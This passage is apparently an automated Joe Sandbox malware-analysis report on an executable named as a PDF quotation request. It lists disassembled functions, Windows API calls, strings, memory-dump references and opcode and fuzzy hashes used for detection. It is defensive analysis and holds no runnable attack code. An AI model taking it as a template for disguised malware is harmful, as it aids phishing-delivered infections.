                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                    • String ID: @EXITCODE
                                                                    • API String ID: 2734553683-3436989551
                                                                    • Opcode ID: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                                                    • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                    • Opcode Fuzzy Hash: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                                                    • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                    Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • wsprintfW.USER32 ref: 0045612A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_mallocwsprintf
                                                                    • String ID: %d/%02d/%02d
                                                                    • API String ID: 1262938277-328681919
                                                                    • Opcode ID: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                                                    • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                    • Opcode Fuzzy Hash: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                                                    • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                    Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetCloseHandle.WININET(?), ref: 00442663
                                                                    • InternetCloseHandle.WININET ref: 00442668
                                                                      • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleInternet$ObjectSingleWait
                                                                    • String ID: aeB
                                                                    • API String ID: 857135153-906807131
                                                                    • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                    • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                    • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                    • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                    Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, xrefs: 0043324B
                                                                    • ^B, xrefs: 00433248
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsncpy
                                                                    • String ID: ^B$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                    • API String ID: 1735881322-1751989784
                                                                    • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                    • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                    • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                    • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                    Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                    • PostMessageW.USER32(00000000), ref: 00441C05
                                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                    • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                    • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                    • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                    Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                    • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                    • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                    • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                    Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                      • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Message_doexit
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 1993061046-4017498283
                                                                    • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                    • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                    • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                    • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D